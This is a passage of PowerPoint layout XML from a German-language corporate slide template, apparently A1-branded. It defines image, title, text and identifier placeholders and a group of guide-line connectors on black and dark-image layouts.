            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5AEA83-197F-45C7-851A-B793E773E7CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="2736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3682301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r Bild + großer Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A3C5DA-BB1C-4188-ADE6-8DC80F71E120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{939AB910-F88F-4292-A338-9745F5398066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696001" y="549274"/>
            <a:ext cx="10799999" cy="5508625"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="101600">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertextformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299F0196-E687-4CA6-9C8E-47A7AF55B726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="2736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983244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A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97586D0B-BD35-4770-AC65-17305741D2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="2736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858914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Schwarz">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="000000"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="!!Hilfslinien">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F477FB32-3A49-4A78-90D0-FCDEDBCABDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-313152" y="-316200"/>
            <a:ext cx="12818304" cy="7490400"/>
            <a:chOff x="-313152" y="-316200"/>
            <a:chExt cx="12818304" cy="7490400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Gerade Verbindung mit Pfeil 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A43782D-54E4-4ACD-9E81-D330D3CC1EA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4078817" y="-316200"/>
              <a:ext cx="0" cy="2400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8C41D337-7B20-4D94-A9D2-C8A2C6B723A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096000" y="-316200"/>
              <a:ext cx="0" cy="2400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Gerade Verbindung mit Pfeil 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59CDEA6-E18F-4DF1-A6D3-97D07DA2E06C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8113184" y="-316200"/>
              <a:ext cx="0" cy="2400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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B454EA7C-1D84-4ADC-A5A7-97C49982865A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4078817" y="6934200"/>
              <a:ext cx="0" cy="24000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Gerade Verbindung mit Pfeil 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9063E7F5-2300-4546-BF55-1C1882EA1AE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096000" y="6934200"/>
              <a:ext cx="0" cy="24000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Gerade Verbindung mit Pfeil 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3CD499E-9616-4A79-BE21-EBBA6CECFDD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8113184" y="6934200"/>
              <a:ext cx="0" cy="24000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Gerade Verbindung mit Pfeil 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F36D94F-BF19-411A-B472-F1CD98DFB84E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="2277533"/>
              <a:ext cx="2400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Gerade Verbindung mit Pfeil 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA217AE9-0746-4E36-A8FA-001BE86C91A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="3429000"/>
              <a:ext cx="2400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Gerade Verbindung mit Pfeil 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B7B894-3169-485F-9FB0-47033D28DB75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="4580467"/>
              <a:ext cx="2400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Gerade Verbindung mit Pfeil 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCA0B88-ABC0-4613-9504-500F6CF62BDE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="2277533"/>
              <a:ext cx="240000" cy="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Gerade Verbindung mit Pfeil 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A83DF82-88C5-45A0-9E65-C791E517D3CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="3429000"/>
              <a:ext cx="240000" cy="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A43C5248-CE8F-4E18-93C2-DE834A7E613F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="4580467"/>
              <a:ext cx="240000" cy="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Gerade Verbindung mit Pfeil 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64F8E58-975C-4A8D-8ACE-FA82E0F23767}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="695325" y="-316200"/>
              <a:ext cx="0" cy="24000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7017E8A2-42D3-4B4A-89B1-37E11A4B33B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11496675" y="-316200"/>
              <a:ext cx="0" cy="24000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24D39A5D-8566-47AB-9B21-06BFE6F719F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="695325" y="6934200"/>
              <a:ext cx="0" cy="24000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BAF39025-FEF7-41AB-B446-D483350E4326}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11496675" y="6934200"/>
              <a:ext cx="0" cy="24000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79734AFC-1CA0-4C54-A284-F2E1551D48ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="550333"/>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4DA8FF15-80DD-416E-B56A-E1D20EA2F6D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="6057292"/>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9FBDB228-2136-4C0F-AC99-B87C74CB20E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="6305550"/>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Gerade Verbindung mit Pfeil 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C86D8B89-9E7C-4423-93FA-70E8EA3789FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="550333"/>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Gerade Verbindung mit Pfeil 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED99305-16B6-41D2-B9D5-973A93FE8676}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="6057292"/>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Gerade Verbindung mit Pfeil 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C8BE95-587B-49D9-8165-5DB2C3947A78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="6305550"/>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Gerade Verbindung mit Pfeil 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C01ED45-76EB-4410-9D4E-035A1013AF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="1768474"/>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Gerade Verbindung mit Pfeil 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9947D4-D2B5-4800-836B-C6E061A5C609}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="1768474"/>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id="{28FBCC3C-8390-4AD0-857A-FE6C891FD607}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="5805264"/>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5BEEF049-5132-4BD8-BB8B-7BF2132091B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="5805264"/>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390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 dunkles Bild">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751D73C5-5FDD-4823-816D-BDEFD9D375AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="6858000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="72000"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63194F4A-212B-4FB5-B826-5F7FA3B9217C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="1175249"/>
            <a:ext cx="10800000" cy="3409200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="101600">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3ED52C9-0C7E-4138-812E-555BC2DA471F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="4740774"/>
            <a:ext cx="10800000" cy="1584000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="101600">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:glo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19" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ACC0FE4-3ADC-4201-A1D6-172B37E58296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8980200" y="5883257"/>
            <a:ext cx="2516400" cy="5436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71509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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE739F7B-3735-4AA1-B5AB-AEC5484D29ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Grafik 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1275717E-707B-4DFE-A2FD-5E1C7FA9EC45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Textfeld 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5045B1DD-AA61-4E97-8118-957C5FCFBECF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rechteck 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7EC102A-EA5F-407E-B82D-38E56041DAAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004E72EC-F55F-430F-87D2-68708AB42986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08563F00-2EC0-4CAD-896F-D355DDF69AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1711325"/>
            <a:ext cx="10800000" cy="4608000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
